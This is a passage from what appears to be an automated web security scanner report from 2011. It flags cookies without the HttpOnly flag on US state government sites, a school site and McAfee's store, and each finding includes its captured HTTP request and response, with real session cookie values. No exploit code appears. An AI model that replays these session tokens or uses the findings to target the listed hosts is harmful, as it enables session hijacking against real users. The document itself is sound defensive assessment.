Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDACBARBRA=HAJHPMIBOBEFLDIFCCKBEJKC; path=/
Cache-control: private
Content-Length: 7333


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv
...[SNIP]...

14.93. https://secure.apps.state.nd.us/dot/mv/mvrenewal/renewal.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.apps.state.nd.us
Path:   /dot/mv/mvrenewal/renewal.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dot/mv/mvrenewal/renewal.htm HTTP/1.1
Host: secure.apps.state.nd.us
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:20:33 GMT
Server: IBM_HTTP_Server
Expires: Sat, 25 Dec 1993 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Content-Length: 5917
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: JSESSIONID=00006ggXFuNilHcrYqmDvIYzvFS:13fea6dft; Path=/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:la
...[SNIP]...

14.94. https://secure.sces.org/PDIC/GatewayServlet  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.sces.org
Path:   /PDIC/GatewayServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PDIC/GatewayServlet HTTP/1.1
Host: secure.sces.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:28:17 GMT
Server: IBM_HTTP_Server
Location: https://secure.sces.org/PDIC/GatewayServlet?hptAppId=ICFJREG&hptExec=Y
Content-Length: 0
Set-Cookie: JSESSIONID=0000ClCDh49_s9SCRFnwCZw1q60:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/plain
Content-Language: en-US


14.95. https://secure.utah.gov/rex/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.utah.gov
Path:   /rex/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rex/ HTTP/1.1
Host: secure.utah.gov
Connection: keep-alive
Referer: http://www.utah.gov/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147646579.1304162117.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147646579.301159884.1304162117.1304162117.1304162117.1; __utmc=147646579; __utmb=147646579.2.10.1304162117

Response

HTTP/1.1 200 OK
X-Powered-By: JSP/2.1
Server: Sun GlassFish Enterprise Server v2.1
Set-Cookie: JSESSIONID=627aa9217be58462c8e18734b023; Path=/rex; Secure
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 79
Date: Sat, 30 Apr 2011 11:25:08 GMT

<script type="text/javascript">
document.location = "index.html";
</script>

14.96. https://secure.utah.gov/rex/index.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.utah.gov
Path:   /rex/index.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rex/index.html HTTP/1.1
Host: secure.utah.gov
Connection: keep-alive
Referer: https://secure.utah.gov/rex/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=627a4341b3c7de4c5fcf7affae3f; __utmz=147646579.1304162117.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147646579.301159884.1304162117.1304162117.1304162117.1; __utmc=147646579; __utmb=147646579.2.10.1304162117

Response

HTTP/1.1 200 OK
X-Powered-By: JSP/2.1
Server: Sun GlassFish Enterprise Server v2.1
Set-Cookie: JSESSIONID=627b23b1307037a0ea56cd17953a; Path=/rex; Secure
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Sat, 30 Apr 2011 11:25:09 GMT
Content-Length: 6636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">    <head>    
...[SNIP]...

14.97. https://services.georgia.gov/dhr/cspp/do/public/Welcome  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://services.georgia.gov
Path:   /dhr/cspp/do/public/Welcome

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dhr/cspp/do/public/Welcome HTTP/1.1
Host: services.georgia.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 12:22:50 GMT
Server: Sun-Java-System/Application-Server
Content-type: text/html;charset=UTF-8
X-powered-by: Servlet/2.4
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-powered-by: JSP/2.0
Set-cookie: JSESSIONID=a6618311cdf773ffffffff8fe26605d0e2529; Path=/dhr/cspp
Connection: close


<html>
<body>


<table border="0" cellspacing="0" cellpadding="0">
   <tr>
       <td>
           <body style="background-color:#E2E1C3;">
               <TABLE cellSpacing=0 cellPadding=0 wid
...[SNIP]...

14.98. http://smu.governor.delaware.gov/cgi-bin/mail.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://smu.governor.delaware.gov
Path:   /cgi-bin/mail.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/mail.php HTTP/1.1
Host: smu.governor.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:28:12 GMT
Server: Apache/2.2.0 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=d3aorgscmmpsq8fb7tmb400057; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=s8hfvgb6d3ehj27d3fkkdfpu85; path=/
Location: ./error.php
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


14.99. http://smu.portal.delaware.gov/cgi-bin/mail.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://smu.portal.delaware.gov
Path:   /cgi-bin/mail.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/mail.php HTTP/1.1
Host: smu.portal.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:28:12 GMT
Server: Apache/2.2.0 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=rsq6r8jgj7rtobilftcf8dtp12; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=00b3laabsof8du3iuai6q1rih3; path=/
Location: ./error.php
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


14.100. http://sussex.de.schoolwebpages.com/education/school/school.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sussex.de.schoolwebpages.com
Path:   /education/school/school.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /education/school/school.php HTTP/1.1
Host: sussex.de.schoolwebpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:28:36 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=763ed288d6fac2c42d2ea6760af43148; path=/
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Location: ../district/district.php?url_redirect=1
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html


14.101. https://unitedalert.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://unitedalert.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: unitedalert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:28:52 GMT
Server: Apache/2.2
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: PHPSESSID=ceiaqg112uta410c27gi7ihi84; path=/
Set-Cookie: X-Mapping-abiknkkh=3EEB2AE635DD7C372F7D3DF20A0A1F9F; path=/
Connection: close
Content-Length: 8865

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head><title>United Alert: Free Emergency Alert and Group Communication Service, SMS and Email </ti
...[SNIP]...

14.102. http://us.mcafee.com/root/basket.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://us.mcafee.com
Path:   /root/basket.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /root/basket.asp HTTP/1.1
Host: us.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f%3fofferId%3d266730%26PkgQty%3d1&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; lBounceURL=http%3A%2F%2Fus%2Emcafee%2Ecom%2Froot%2Fbasket%2Easp%3Faffid%3D0%26; ASPSESSIONIDSQTRCCBC=KPLDIJODDCHEAHCOCAPBNDGC; AffID=0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=en%2Dus; SessionInfo=AffiliateId=0&CampaignId=78228; s_campaign=78228; CampaignId=86873; ASPSESSIONIDSCARSBBC=LPHHDJODOEABGOHIPLKDDJDD; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3CUserContext%3E%3CAffID%3E0%3C%2FAffID%3E%3CAffBuildID%3E0%3C%2FAffBuildID%3E%3C%2FUserContext%3E%0D%0A; session%5Fdata=%3CSessionData%3E%0D%0A%09%3Ctempfrlu%3E%3C%2Ftempfrlu%3E%0D%0A%09%3Cwt%5Fsource%3EOther%3C%2Fwt%5Fsource%3E%0D%0A%09%3COrganicSearchtraffic%3E1%3C%2FOrganicSearchtraffic%3E%0D%0A%09%3Cwt%5Fsource%5Fcid%3E86873%3C%2Fwt%5Fsource%5Fcid%3E%0D%0A%09%3Cwt%5Fdestination%5Fcid%3E86873%3C%2Fwt%5Fdestination%5Fcid%3E%0D%0A%09%3CBasketflowid%3E0%3C%2FBasketflowid%3E%3C%2FSessionData%3E%0D%0A; Currency=56; SiteID=1;

Response

HTTP/1.1 302 Object moved
Date: Fri, 29 Apr 2011 21:18:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: https://home.mcafee.com/secure/cart/
Content-Length: 157
Content-Type: text/html; Charset=iso-8859-1
Expires: Thu, 28 Apr 2011 21:18:53 GMT
Set-Cookie: session%5Fdata=%3CSessionData%3E%0D%0A%09%3Ctempfrlu%3E%3C%2Ftempfrlu%3E%0D%0A%09%3Cwt%5Fsource%3EOther%3C%2Fwt%5Fsource%3E%0D%0A%09%3COrganicSearchtraffic%3E1%3C%2FOrganicSearchtraffic%3E%0D%0A%09%3Cwt%5Fsource%5Fcid%3E86873%3C%2Fwt%5Fsource%5Fcid%3E%0D%0A%09%3Cwt%5Fdestination%5Fcid%3E86873%3C%2Fwt%5Fdestination%5Fcid%3E%0D%0A%09%3CBasketflowid%3E0%3C%2FBasketflowid%3E%3C%2FSessionData%3E%0D%0A; domain=mcafee.com; path=/
Set-Cookie: Locale=en%2Dus; expires=Sun, 29-Apr-2012 07:00:00 GMT; domain=mcafee.com; path=/
Set-Cookie: lUsrCtxSession=%3CUserContext%3E%3CAffID%3E0%3C%2FAffID%3E%3CAffBuildID%3E0%3C%2FAffBuildID%3E%3C%2FUserContext%3E%0D%0A; domain=mcafee.com; path=/
Set-Cookie: AffID=0; domain=mcafee.com; path=/
Set-Cookie: lBounceURL=http%3A%2F%2Fus%2Emcafee%2Ecom%2Froot%2Fbasket%2Easp%3F; domain=mcafee.com; path=/
Set-Cookie: langid=1; domain=mcafee.com; path=/
Set-Cookie: ASPSESSIONIDQQSTBABC=OIGKEJODAPCBNHJEBGPAEJNF; path=/
Cache-control: private
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://home.mcafee.com/secure/cart/">here</a>.</body>

14.103. http://us.mcafee.com/root/basket.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://us.mcafee.com
Path:   /root/basket.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /root/basket.asp?affid=0& HTTP/1.1
Host: us.mcafee.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionInfo=AffiliateId=0&CampaignId=78228; s_cc=true; s_campaign=78228; s_nr=1304109967309-New; s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; CampaignId=86873; ASPSESSIONIDSQTRCCBC=KPLDIJODDCHEAHCOCAPBNDGC; ASPSESSIONIDSCARSBBC=LPHHDJODOEABGOHIPLKDDJDD; CookieInformation=locale=us; lBounceURL=http://home.mcafee.com/secure/cart/?offerId=266730&PkgQty=1; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Locale=EN-US; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; AffID=0-0; Currency=56; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f%3fofferId%3d266730%26PkgQty%3d1&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; IscartemptySiteidAffid=no-1-0

Response

HTTP/1.1 302 Object moved
Date: Fri, 29 Apr 2011 20:58:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: https://home.mcafee.com/secure/cart/
Content-Length: 157
Content-Type: text/html; Charset=iso-8859-1
Expires: Thu, 28 Apr 2011 20:58:07 GMT
Set-Cookie: AffID=0; domain=.mcafee.com; path=/
Set-Cookie: Locale=en%2Dus; expires=Sun, 29-Apr-2012 07:00:00 GMT; domain=.mcafee.com; path=/
Set-Cookie: langid=1; domain=.mcafee.com; path=/
Set-Cookie: lBounceURL=http%3A%2F%2Fus%2Emcafee%2Ecom%2Froot%2Fbasket%2Easp%3Faffid%3D0%26; domain=.mcafee.com; path=/
Set-Cookie: lUsrCtxSession=%3CUserContext%3E%3CAffID%3E0%3C%2FAffID%3E%3CAffBuildID%3E0%3C%2FAffBuildID%3E%3C%2FUserContext%3E%0D%0A; domain=.mcafee.com; path=/
Set-Cookie: session%5Fdata=%3CSessionData%3E%0D%0A%09%3Ctempfrlu%3E%3C%2Ftempfrlu%3E%0D%0A%09%3Cwt%5Fsource%3EOther%3C%2Fwt%5Fsource%3E%0D%0A%09%3COrganicSearchtraffic%3E1%3C%2FOrganicSearchtraffic%3E%0D%0A%09%3Cwt%5Fsource%5Fcid%3E86873%3C%2Fwt%5Fsource%5Fcid%3E%0D%0A%09%3Cwt%5Fdestination%5Fcid%3E86873%3C%2Fwt%5Fdestination%5Fcid%3E%0D%0A%09%3CBasketflowid%3E0%3C%2FBasketflowid%3E%3C%2FSessionData%3E%0D%0A; domain=.mcafee.com; path=/
Set-Cookie: ASPSESSIONIDCSASRBCD=BCDGAKODDEONHOLIMBKJLOMJ; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://home.mcafee.com/secure/cart/">here</a>.</body>

14.104. http://us.mcafee.com/root/basket.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://us.mcafee.com
Path:   /root/basket.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /root/basket.asp?affid=0& HTTP/1.1
Host: us.mcafee.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionInfo=AffiliateId=0&CampaignId=78228; s_cc=true; s_campaign=78228; s_nr=1304109967309-New; s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; CampaignId=86873; ASPSESSIONIDSQTRCCBC=KPLDIJODDCHEAHCOCAPBNDGC; ASPSESSIONIDSCARSBBC=LPHHDJODOEABGOHIPLKDDJDD; CookieInformation=locale=us; lBounceURL=http://home.mcafee.com/secure/cart/?offerId=266730&PkgQty=1; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Locale=EN-US; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; AffID=0-0; Currency=56; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f%3fofferId%3d266730%26PkgQty%3d1&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; IscartemptySiteidAffid=no-1-0

Response

HTTP/1.1 302 Object moved
Date: Fri, 29 Apr 2011 21:18:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: https://home.mcafee.com/secure/cart/
Content-Length: 157
Content-Type: text/html; Charset=iso-8859-1
Expires: Thu, 28 Apr 2011 21:18:16 GMT
Set-Cookie: AffID=0; domain=.mcafee.com; path=/
Set-Cookie: Locale=en%2Dus; expires=Sun, 29-Apr-2012 07:00:00 GMT; domain=.mcafee.com; path=/
Set-Cookie: langid=1; domain=.mcafee.com; path=/
Set-Cookie: lBounceURL=http%3A%2F%2Fus%2Emcafee%2Ecom%2Froot%2Fbasket%2Easp%3Faffid%3D0%26; domain=.mcafee.com; path=/
Set-Cookie: lUsrCtxSession=%3CUserContext%3E%3CAffID%3E0%3C%2FAffID%3E%3CAffBuildID%3E0%3C%2FAffBuildID%3E%3C%2FUserContext%3E%0D%0A; domain=.mcafee.com; path=/
Set-Cookie: session%5Fdata=%3CSessionData%3E%0D%0A%09%3Ctempfrlu%3E%3C%2Ftempfrlu%3E%0D%0A%09%3Cwt%5Fsource%3EOther%3C%2Fwt%5Fsource%3E%0D%0A%09%3COrganicSearchtraffic%3E1%3C%2FOrganicSearchtraffic%3E%0D%0A%09%3Cwt%5Fsource%5Fcid%3E86873%3C%2Fwt%5Fsource%5Fcid%3E%0D%0A%09%3Cwt%5Fdestination%5Fcid%3E86873%3C%2Fwt%5Fdestination%5Fcid%3E%0D%0A%09%3CBasketflowid%3E0%3C%2FBasketflowid%3E%3C%2FSessionData%3E%0D%0A; domain=.mcafee.com; path=/
Set-Cookie: ASPSESSIONIDASAQQCAD=KKHCHJODFCIDKKGEKGJECHIC; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://home.mcafee.com/secure/cart/">here</a>.</body>

14.105. http://us.mcafee.com/root/basket.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://us.mcafee.com
Path:   /root/basket.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /root/basket.asp HTTP/1.1
Host: us.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f%3fofferId%3d266730%26PkgQty%3d1&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; lBounceURL=http%3A%2F%2Fus%2Emcafee%2Ecom%2Froot%2Fbasket%2Easp%3Faffid%3D0%26; ASPSESSIONIDSQTRCCBC=KPLDIJODDCHEAHCOCAPBNDGC; AffID=0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=en%2Dus; SessionInfo=AffiliateId=0&CampaignId=78228; s_campaign=78228; CampaignId=86873; ASPSESSIONIDSCARSBBC=LPHHDJODOEABGOHIPLKDDJDD; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3CUserContext%3E%3CAffID%3E0%3C%2FAffID%3E%3CAffBuildID%3E0%3C%2FAffBuildID%3E%3C%2FUserContext%3E%0D%0A; session%5Fdata=%3CSessionData%3E%0D%0A%09%3Ctempfrlu%3E%3C%2Ftempfrlu%3E%0D%0A%09%3Cwt%5Fsource%3EOther%3C%2Fwt%5Fsource%3E%0D%0A%09%3COrganicSearchtraffic%3E1%3C%2FOrganicSearchtraffic%3E%0D%0A%09%3Cwt%5Fsource%5Fcid%3E86873%3C%2Fwt%5Fsource%5Fcid%3E%0D%0A%09%3Cwt%5Fdestination%5Fcid%3E86873%3C%2Fwt%5Fdestination%5Fcid%3E%0D%0A%09%3CBasketflowid%3E0%3C%2FBasketflowid%3E%3C%2FSessionData%3E%0D%0A; Currency=56; SiteID=1;

Response

HTTP/1.1 302 Object moved
Date: Sat, 30 Apr 2011 12:28:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: https://home.mcafee.com/secure/cart/
Content-Length: 157
Content-Type: text/html; Charset=iso-8859-1
Expires: Fri, 29 Apr 2011 12:28:53 GMT
Set-Cookie: session%5Fdata=%3CSessionData%3E%0D%0A%09%3Ctempfrlu%3E%3C%2Ftempfrlu%3E%0D%0A%09%3Cwt%5Fsource%3EOther%3C%2Fwt%5Fsource%3E%0D%0A%09%3COrganicSearchtraffic%3E1%3C%2FOrganicSearchtraffic%3E%0D%0A%09%3Cwt%5Fsource%5Fcid%3E86873%3C%2Fwt%5Fsource%5Fcid%3E%0D%0A%09%3Cwt%5Fdestination%5Fcid%3E86873%3C%2Fwt%5Fdestination%5Fcid%3E%0D%0A%09%3CBasketflowid%3E0%3C%2FBasketflowid%3E%3C%2FSessionData%3E%0D%0A; domain=mcafee.com; path=/
Set-Cookie: Locale=en%2Dus; expires=Mon, 30-Apr-2012 07:00:00 GMT; domain=mcafee.com; path=/
Set-Cookie: lUsrCtxSession=%3CUserContext%3E%3CAffID%3E0%3C%2FAffID%3E%3CAffBuildID%3E0%3C%2FAffBuildID%3E%3C%2FUserContext%3E%0D%0A; domain=mcafee.com; path=/
